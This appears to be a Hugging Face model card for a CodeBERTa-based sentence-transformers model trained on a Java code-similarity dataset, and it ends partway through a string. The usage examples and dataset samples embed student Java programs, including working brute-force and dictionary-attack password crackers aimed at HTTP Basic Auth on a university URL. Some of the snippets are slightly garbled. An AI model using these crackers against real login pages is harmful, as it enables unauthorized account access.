Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks
Paper • 1908.10084 • Published • 13
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
'\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n String userPassword = ":"+pwd;\n RealThread myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n th.start();\n try\n {\n \n \n th.sleep(100);\n }\n catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty ("Authorization", " " + encoding);\n System.out.println("Reponse = "+uc.getResponseCode()+"for pwd = "+userPassword);\n this.responseCode = uc.getResponseCode();\n \n if(uc.getResponseCode()==200)\n {\n System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println("Could not execute Thread "+num+" ");\n }\n }\n\n}\n',
'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
'\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr = t.exec("md5sum csfirst.html");\n\n InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n BufferedReader bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\t\t index = s.indexOf(\' \');\n\t\t Fmd5 = s.substring(0,index);\n\t\t System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("md5sum index.html");\n\t\t \n\n\t\t InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\t\t index = temp1.indexOf(\' \');\n\t\t Smd5 = temp1.substring(0,index);\n\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5 == Smd5)\n\t\t System.out.println(" changes Detected");\n\t\t else\n\t\t {\n\t\t pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(" Message.txt | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
label, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
import java.io.; |
0 |
import java.util.; |
"+ hash2); BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt")); String line=" " ; String line1=" " ; String line2=" "; String line3=" "; String[] cad = new String[10]; executes("./.sh"); int i=0; while ((line = buf.readLine()) != null) { line1="http://www.cs.rmit.edu./students/images"+line; if (i==1) line2="http://www.cs.rmi... |
0 |
|
|
SoftmaxLosslabel, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.; |
|
0 |
|
|
SoftmaxLosseval_strategy: stepsper_device_train_batch_size: 16per_device_eval_batch_size: 16learning_rate: 2e-05num_train_epochs: 1warmup_ratio: 0.1fp16: Trueoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: stepsprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 2e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1.0num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.1warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Truefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: proportional| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.2015 | 0.0240 |
| 0.1064 | 200 | 0.0143 | 0.0209 |
| 0.1596 | 300 | 0.0241 | 0.0241 |
| 0.2128 | 400 | 0.0174 | 0.0213 |
| 0.2660 | 500 | 0.0228 | 0.0206 |
| 0.3191 | 600 | 0.0061 | 0.0226 |
| 0.3723 | 700 | 0.0194 | 0.0208 |
| 0.4255 | 800 | 0.0193 | 0.0197 |
| 0.4787 | 900 | 0.0261 | 0.0175 |
| 0.5319 | 1000 | 0.0189 | 0.0178 |
| 0.5851 | 1100 | 0.0089 | 0.0188 |
| 0.6383 | 1200 | 0.0174 | 0.0161 |
| 0.6915 | 1300 | 0.0171 | 0.0162 |
| 0.7447 | 1400 | 0.0149 | 0.0155 |
| 0.7979 | 1500 | 0.011 | 0.0164 |
| 0.8511 | 1600 | 0.0308 | 0.0160 |
| 0.9043 | 1700 | 0.0048 | 0.0167 |
| 0.9574 | 1800 | 0.0142 | 0.0164 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1
from sentence_transformers import SentenceTransformer model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss") sentences = [ " \n\n\n\n\nimport java.util.*;\nimport java.io.*;\n\npublic class MyTimer\n{\t\n\n\tpublic static void main(String args[])\n\t{\n\t\tWatchdog watch = new Watchdog();\n\t\tTimer time = new Timer();\n\t\ttime.schedule(watch,864000000,864000000);\n\t\t\n\t\t\t\n\t}\n}\n", "\n\npublic class Base64 {\n\n\nstatic public char[] encode(byte[] data)\n{\n char[] out = new char[((data.length + 2) / 3) * 4];\n\n \n \n \n \n for (int i=0, index=0; i<data.length; i+=3, index+=4) {\n boolean quad = false;\n boolean trip = false;\n\n int bat = (0xFF & (int) data[i]);\n bat <<= 8;\n if ((i+1) < data.length) {\n bat |= (0xFF & (int) data[i+1]);\n trip = true;\n }\n bat <<= 8;\n if ((i+2) < data.length) {\n bat |= (0xFF & (int) data[i+2]);\n quad = true;\n }\n out[index+3] = alphabet[(quad? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+2] = alphabet[(trip? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+1] = alphabet[bat & 0x3F];\n bat >>= 6;\n out[index+0] = alphabet[ bat & 0x3F];\n }\n return out;\n}\n\n \nstatic public byte[] decode(char[] data)\n{\n \n \n \n \n \n \n\n int tempLen = data.length;\n for( int ix=0; ix<data.length; ix++ )\n {\n if( (data[ix] > 255) || codes[ data[ix] ] < 0 )\n --tempLen; \n }\n \n \n \n \n\n int len = (tempLen / 4) * 3;\n if ((tempLen % 4) == 3) len += 2;\n if ((tempLen % 4) == 2) len += 1;\n\n byte[] out = new byte[len];\n\n\n\n int shift = 0; \n int accum = 0; \n int index = 0;\n\n \n for (int ix=0; ix<data.length; ix++)\n {\n int value = (data[ix]>255)? -1: codes[ data[ix] ];\n\n if ( value >= 0 ) \n {\n accum <<= 6; \n shift += 6; \n accum |= value; \n if ( shift >= 8 ) \n {\n shift -= 8; \n out[index++] = \n (byte) ((accum >> shift) & 0xff);\n }\n }\n \n \n \n \n \n \n }\n\n \n if( index != out.length)\n {\n throw new Error(\"Miscalculated data length (wrote \" + index + \" instead of \" + out.length + \")\");\n }\n\n return out;\n}\n\n\n\n\n\nstatic private char[] alphabet =\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\n .toCharArray();\n\n\n\n\nstatic private byte[] codes = new byte[256];\nstatic {\n for (int i=0; i<256; i++) codes[i] = -1;\n for (int i = 'A'; i <= 'Z'; i++) codes[i] = (byte)( i - 'A');\n for (int i = 'a'; i <= 'z'; i++) codes[i] = (byte)(26 + i - 'a');\n for (int i = '0'; i <= '9'; i++) codes[i] = (byte)(52 + i - '0');\n codes['+'] = 62;\n codes['/'] = 63;\n}\n}", "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\nimport javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\nimport javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper() {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\treturn testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps() throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n", "\n\nimport java.util.*;\nimport java.*;\nimport java.awt.*;\nimport java.net.*;\nimport java.io.*;\nimport java.text.*;\n\npublic class Dictionary {\n \n \n \n public static String Base64Encode(String s) {\n byte[] bb = s.getBytes();\n byte[] b = bb;\n char[] table = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\n 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\n '0','1','2','3','4','5','6','7','8','9','+','/' };\n if (bb.length % 3!=0) {\n int x1 = bb.length;\n \n b = new byte[(x1/3+1)*3];\n int x2 = b.length;\n \n for(int i=0;i<x1;i++)\n b[i] = bb[i];\n for(int i=x1;i<x2;i++)\n b[i] = 0;\n }\n \n char[] c = new char[b.length/3*4];\n \n int i=0, j=0;\n while (i+3<=b.length) {\n c[j] = table[(b[i] >> 2)];\n c[j+1] = table[(b[i+1] >> 4) | ((b[i] & 3) << 4)];\n c[j+2] = table[(b[i+2] >> 6) | ((b[i+1] & 15) << 2)];\n c[j+3] = table[(b[i+2] & 63)];\n i+=3;\n j+=4;\n }\n \n j = c.length-1;\n while (c[j]=='A') {\n c[j]='=';\n j--;\n }\n \n return String.valueOf(c);\n }\n \n \n public synchronized void getAccumulatedLocalAttempt() {\n attempt = 0;\n for (int i=0;i<MAXTHREAD;i++) {\n attempt += threads[i].getLocalAttempt();\n }\n }\n \n \n public synchronized void printStatusReport(String Attempt, String currprogress,String ovrl, double[] attmArr, int idx) {\n DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n System.out.println();\n System.out.println(\" ------------------------ [ CURRENT STATISTICS ] ---------------------------\");\n System.out.println();\n System.out.println(\" Current connections : \"+curconn);\n System.out.println(\" Current progress : \"+attempt+ \" of \"+ALLCOMBI+\" (\"+currprogress+\"%)\");\n System.out.println(\" Overall Attempts rate : \"+ovrl+\" attempts second (approx.)\");\n System.out.println();\n System.out.println(\" ---------------------------------------------------------------------------\");\n System.out.println();\n }\n \n \n public class MyTT extends TimerTask {\n \n public synchronized void run() {\n \n \n if (count==REPORT_INTERVAL) {\n \n DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n \n getAccumulatedLocalAttempt();\n double p = (double)attempt/(double)ALLCOMBI*100;\n \n \n double aps = (double) (attempt - attm) / REPORT_INTERVAL;\n \n \n attmArr[attmArrIdx++] = aps;\n \n \n printStatusReport(String.valueOf(attempt),fmt.format(p),fmt.format(getOverallAttemptPerSec()),attmArr,attmArrIdx);\n count = 0;\n } else\n \n if (count==0) {\n getAccumulatedLocalAttempt();\n attm = attempt;\n count++;\n } else {\n count++;\n }\n }\n \n \n \n public synchronized double getOverallAttemptPerSec() {\n double val = 0;\n \n if (attmArrIdx==0) {\n return attmArrIdx;\n } else {\n for (int i=0;i<attmArrIdx;i++) {\n val+= attmArr[i];\n }\n return val / attmArrIdx;\n }\n }\n \n private int count = 0;\n private int attm;\n private int attmArrIdx = 0;\n private double[] attmArr = new double[2*60*60/10]; \n }\n \n \n public synchronized void interruptAll(int ID) {\n for (int i=0;i<MAXTHREAD;i++) {\n if ((threads[i].isAlive()) && (i!=ID)) {\n threads[i].interrupt();\n }\n notifyAll();\n }\n }\n \n \n \n public synchronized void setSuccess(int ID, String p) {\n passw = p;\n success = ID;\n notifyAll();\n interruptAll(ID);\n \n \n end = System.currentTimeMillis();\n }\n \n \n public synchronized boolean isSuccess() {\n return (success>=0);\n }\n \n \n \n public synchronized void waitUntilAllTerminated() {\n while (curconn>0) {\n try {\n wait();\n } catch (InterruptedException e) {}\n }\n }\n \n \n \n \n public synchronized int waitUntilOK2Connect() {\n boolean interruptd= false;\n int idx = -1;\n \n \n \n \n while (curconn>=MAXCONN) {\n try {\n wait();\n } catch (InterruptedException e) { interruptd = true; }\n }\n \n \n \n if (!interruptd) {\n \n curconn++;\n for (idx=0;idx<MAXCONN;idx++)\n if (!connused[idx]) {\n connused[idx] = true;\n break;\n }\n \n notifyAll();\n }\n \n \n return idx;\n }\n \n \n public synchronized void decreaseConn(int idx) {\n curconn--;\n connused[idx] = false;\n \n \n notifyAll();\n }\n \n \n \n \n public String[] fetchWords( int idx,int n) {\n String[] result = new String[n];\n try {\n \n BufferedReader b = new BufferedReader(new FileReader(TEMPDICT));\n \n for (int i=0;i<idx;i++) { b.readLine(); }\n \n for (int i=0;i<n;i++) {\n result[i] = b.readLine();\n }\n \n b.print();\n } catch (FileNotFoundException e) {\n System.out.println(e);\n System.exit(0);\n } catch (IOException e) {}\n return result;\n }\n \n \n public String fetchWord( int idx) {\n String result = null;\n try {\n \n BufferedReader b = new BufferedReader(new FileReader(TEMPDICT));\n \n for (int i=0;i<idx;i++) { b.readLine(); }\n \n result = b.readLine();\n \n b.print();\n } catch (FileNotFoundException e) {\n System.out.println(e);\n System.exit(0);\n } catch (IOException e) {}\n return result;\n }\n \n \n public static void readThroughDictionary() {\n try {\n \n BufferedReader b = new BufferedReader(new FileReader(DICTIONARY));\n PrintWriter w = new PrintWriter(new BufferedWriter(new FileWriter(TEMPDICT)));\n String s;\n \n ALLCOMBI = 0;\n while ((s=b.readLine())!=null) {\n if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR)) {\n w.println(s);\n ALLCOMBI++;\n }\n }\n b.print();\n w.print();\n } catch (FileNotFoundException e) {\n System.out.println(\"Unable open the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n } catch (IOException e) {\n System.out.println(\"Error in the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n }\n }\n \n \n \n \n \n public class ThCrack extends Thread {\n \n \n public ThCrack(int threadID, int startidx, int endidx) {\n super(\" Thread #\"+String.valueOf(threadID)+\": \");\n this.ID = threadID;\n this.startidx = startidx;\n this.endidx = endidx;\n \n \n if (endidx>=startidx+MAXCACHE-1) {\n this.localDict = new String[MAXCACHE];\n this.localDict = fetchWords(startidx,MAXCACHE);\n lastFetchIdx = startidx+MAXCACHE-1;\n } else {\n this.localDict = new String[(int)(endidx-startidx+1)];\n this.localDict = fetchWords(startidx,(int)(endidx-startidx+1));\n lastFetchIdx = endidx;\n }\n \n setDaemon(true);\n }\n \n \n public boolean launchRequest(String ID, int connID,String thePass) throws IOException, InterruptedException {\n int i;\n String msg;\n \n \n URL tryURL = new URL(THEURL);\n \n \n connections[connID]=(HttpURLConnection) tryURL.openConnection();\n \n \n connections[connID].setRequestProperty(\"Authorization\",\" \"+Base64Encode(USERNAME+\":\"+thePass));\n \n \n i = connections[connID].getResponseCode();\n msg = connections[connID].getResponseMessage();\n connections[connID].disconnect();\n \n \n if (i==HttpURLConnection.HTTP_OK) {\n \n System.out.println(ID+\"Trying '\"+thePass+\"' GOTCHA !!! (= \"+String.valueOf()+\"-\"+msg+\").\");\n setSuccess(this.ID,thePass);\n return (true);\n } else {\n \n System.out.println(ID+\"Trying '\"+thePass+\"' FAILED (= \"+String.valueOf()+\"-\"+msg+\").\");\n return (false);\n }\n }\n \n \n public void rest(int msec) {\n try { sleep(msec); } catch (InterruptedException e) {}\n }\n \n \n public String getCacheIdx(int idx) {\n if (idx<=lastFetchIdx) {\n return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n } else {\n if (lastFetchIdx+localDict.length-1>endidx) {\n this.localDict = fetchWords(lastFetchIdx+1,(int)(endidx-lastFetchIdx-1));\n lastFetchIdx = endidx;\n } else {\n this.localDict = fetchWords(lastFetchIdx+1,localDict.length);\n lastFetchIdx = lastFetchIdx+localDict.length;\n }\n return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n }\n }\n \n \n \n public String constructPassword(int idx) {\n return getCacheIdx(idx);\n }\n \n \n public String getStartStr() {\n return fetchWord(this.startidx);\n }\n \n \n public String getEndStr() {\n return fetchWord(this.endidx);\n }\n \n \n public void run() {\n i = startidx;\n boolean keeprunning = true;\n while ((!isSuccess()) && (i<=endidx) && (keeprunning)) {\n \n \n int idx = waitUntilOK2Connect();\n \n \n if (idx==-1) {\n \n break;\n }\n \n try {\n \n String s = constructPassword(i);\n \n if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR))\n launchRequest(getName(), idx, s);\n else\n System.out.println(getName()+\"skipping '\"+s+\"'\");\n \n decreaseConn(idx);\n \n localattempt++;\n \n \n rest(MAXCONN);\n i++;\n } catch (InterruptedException e) {\n \n \n keeprunning = false;\n break;\n } catch (IOException e) {\n \n \n \n \n \n decreaseConn(idx);\n }\n }\n \n \n if (success==this.ID) {\n waitUntilAllTerminated();\n }\n }\n \n \n public int getLocalAttempt() {\n return localattempt;\n }\n \n private int startidx,endidx;\n private int ID;\n private int localattempt = 0;\n private String localDict[]; \n private int lastFetchIdx;\n }\n \n \n public void printProgramHeader(String mode,int nThread) {\n System.out.println();\n System.out.println(\" ********************** [ DICTIONARY CRACKING SYSTEM ] *********************\");\n System.out.println();\n System.out.println(\" URL : \"+THEURL);\n System.out.println(\" Crack Mode : \"+mode);\n System.out.println(\" . Char : \"+MINCHAR);\n System.out.println(\" . Char : \"+MAXCHAR);\n System.out.println(\" # of Thread : \"+nThread);\n System.out.println(\" Connections : \"+MAXCONN);\n System.out.println(\" All Combi. : \"+ALLCOMBI);\n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n }\n \n \n public void startNaiveCracking() {\n MAXTHREAD = 1;\n MAXCONN = 1;\n startDistCracking();\n }\n \n \n public void startDistCracking() {\n int startidx,endidx;\n int thcount;\n \n \n if (isenhanced) {\n printProgramHeader(\"ENHANCED DICTIONARY CRACKING ALGORITHM\",MAXTHREAD);\n } else {\n printProgramHeader(\"NAIVE DICTIONARY CRACKING ALGORITHM\",MAXTHREAD);\n }\n \n \n \n \n \n \n \n \n if (MAXTHREAD>ALLCOMBI) { MAXTHREAD = (int) (ALLCOMBI); }\n mult = (ALLCOMBI) / MAXTHREAD;\n \n \n i = System.currentTimeMillis();\n \n \n for (thcount=0;thcount<MAXTHREAD-1;thcount++) {\n startidx = thcount*mult;\n endidx = (thcount+1)*mult-1;\n threads[thcount] = new ThCrack(thcount, startidx, endidx);\n System.out.println(threads[thcount].getName()+\" try crack from '\"+threads[thcount].getStartStr()+\"' '\"+threads[thcount].getEndStr()+\"'\");\n }\n \n \n \n \n \n startidx = (MAXTHREAD-1)*mult;\n endidx = ALLCOMBI-1;\n threads[MAXTHREAD-1] = new ThCrack(MAXTHREAD-1, startidx, endidx);\n System.out.println(threads[MAXTHREAD-1].getName()+\" try crack from '\"+threads[MAXTHREAD-1].getStartStr()+\"' '\"+threads[MAXTHREAD-1].getEndStr()+\"'\");\n \n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n \n \n for (int i=0;i<MAXTHREAD;i++)\n threads[i].print();\n }\n \n \n public Dictionary() {\n \n if (isenhanced) {\n startDistCracking();\n } else {\n startNaiveCracking();\n }\n \n \n reportTimer = new java.util.Timer();\n MyTT tt = new MyTT();\n reportTimer.schedule(tt,0,1000);\n \n \n while ((success==-1) && (attempt<ALLCOMBI)) {\n try { Thread.sleep(100); getAccumulatedLocalAttempt(); } catch (InterruptedException e) { }\n }\n \n \n if (success==-1) {\n end = System.currentTimeMillis();\n }\n \n \n getAccumulatedLocalAttempt();\n \n double ovAps = tt.getOverallAttemptPerSec();\n DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n \n reportTimer.cancel();\n \n \n try { Thread.sleep(1000); } catch (InterruptedException e) { }\n \n \n synchronized (this) {\n if (success>=0) {\n System.out.println();\n System.out.println(\" ********************* [ URL SUCCESSFULLY CRACKED !! ] *********************\");\n System.out.println();\n System.out.println(\" The password is : \"+passw);\n System.out.println(\" Number of attempts : \"+attempt+\" of \"+ALLCOMBI+\" total combinations\");\n System.out.println(\" Attempt position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"%\");\n System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+ \" attempts/sec\");\n System.out.println(\" Cracking time : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n System.out.println(\" Worstcase time estd : \"+fmt.format(1/ovAps*ALLCOMBI)+ \" seconds\");\n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n } else {\n System.out.println();\n System.out.println(\" ********************* [ UNABLE CRACK THE URL !!! ] *********************\");\n System.out.println();\n System.out.println(\" Number of attempts : \"+attempt+\" of \"+ALLCOMBI+\" total combinations\");\n System.out.println(\" Attempt position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"%\");\n System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+ \" attempts/sec\");\n System.out.println(\" Cracking time : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n }\n }\n }\n \n \n public static void printSyntax() {\n System.out.println();\n System.out.println(\"Syntax : Dictionary [mode] [URL] [] [] [username]\");\n System.out.println();\n System.out.println(\" mode : (opt) 0 - NAIVE Dictionary mode\");\n System.out.println(\" (trying from the first the last combinations)\");\n System.out.println(\" 